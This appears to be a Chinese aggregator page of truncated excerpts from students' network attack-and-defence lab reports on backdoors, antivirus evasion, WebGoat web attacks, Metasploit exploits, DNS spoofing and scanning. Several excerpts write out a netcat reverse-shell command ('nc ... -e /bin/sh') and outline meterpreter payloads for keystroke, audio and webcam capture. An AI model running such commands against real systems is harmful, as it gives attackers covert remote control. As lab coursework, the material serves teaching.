20155236范晨歌 Exp2后门原理与实践】的更多相关文章

## 实验二 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP ncat.exe -l -p 5236监听本机的5236端口 在kali端,使用nc指令的-e选项,nc XXX.XXX.XXX.XXX(主机ip) 5236(所设置的端口) -e /bin/sh反向连接Windows主机的5236端口: 在windows端,就可以使用kali的命令行 2.Linux获得Windows Shell 1)在Kali环境下…
20155236范晨歌_免杀原理与实践 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为"反-反病毒",翻译为"反杀毒技术". 被谁杀?当然是被杀毒软件(引擎)杀.所以,要做好免杀技术(防御),就要弄清杀毒方式(攻击),也就是这些杀毒软件是如何工作的. 恶意代码检测方式 基于特征码的检测 特征库,也就是我们平时说的病毒库,它记录了一些恶意软件的特征码…
20155236范晨歌_Web安全基础实践 目录 实践目标 WebGoat BurpSuite Injection Flaws Cross-Site Scripting (XSS) 总结 实践目标 (1)理解常用网络攻击技术的基本原理. (2)Webgoat实践下相关实验. WebGoat WebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的.这个应用程序提供了一个逼真的教学环境,为用户完成课…
20155236范晨歌_Web基础 目录 实践目标 Apache 前端编程 后端编程 PHP MYSQL & 后端 简单SQL注入与XSS 发帖和会话管理 实践目标 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web后端:编写PHP网页,连接数据库,进行用户认证 (5)最简单的SQL注入,XSS攻击测试 (6)发帖和会话管理 Apache Apache就是一个Web服务器,通过该软…
20155236范晨歌_MSF基础应用 20155236范晨歌_MSF基础应用 目录 概述 MS08-067漏洞攻击 MS11-050漏洞攻击 MS10-087漏洞攻击 辅助模块 概述 MSF的六种模块 Exploit模块 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件. 形象点来说就是攻击模块 Payload模块 是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接.实际上,该模块…
20155236范晨歌 Exp7 网络欺诈技术防范 虚拟机经常崩= =,所以基本上做一个实验换一个... 遇到了一个简单的小问题老师帮忙解决了:虚拟机没联网... 一.基础问题回答 通常在什么场景下容易受到DNS spoof攻击? 乱连没有密码的wifi,因为这样就会和连入局域网和该局域网中的各个主机都处于同一网段下了. 在日常生活工作中如何防范以上两攻击方法? URL攻击的防范主要就是打开网页的时候注意看其ip地址,事先可以通过gid命令和nslookup命令查看网站正确的ip地址,如果网站显…
20155236范晨歌_exp6信息搜集与漏洞扫描 目录 实践目标 信息搜集 漏洞扫描 总结 实践目标 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.OS及服务版本探测.具体服务的查点 (4)漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 信息搜集 实验内容 查询一个网站的注册信息,可以看到其拥有的ip段.注册地址.注册人.联系方式.所属国家城市和地理信息:追踪路由探测数据包的传递过程,并利用ip定位查看路由地理信息:利用搜索引擎精确获…
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其他软件)生成获取目标…
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Windows下,先使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的5324端口: 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5324端口: Windows下成功获得了一个Kali的shell,运行ls指令如下: Linux获得Windows Shell 过程与之…
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 二.基础知识 Kali地址:192.168.153.134 Wi…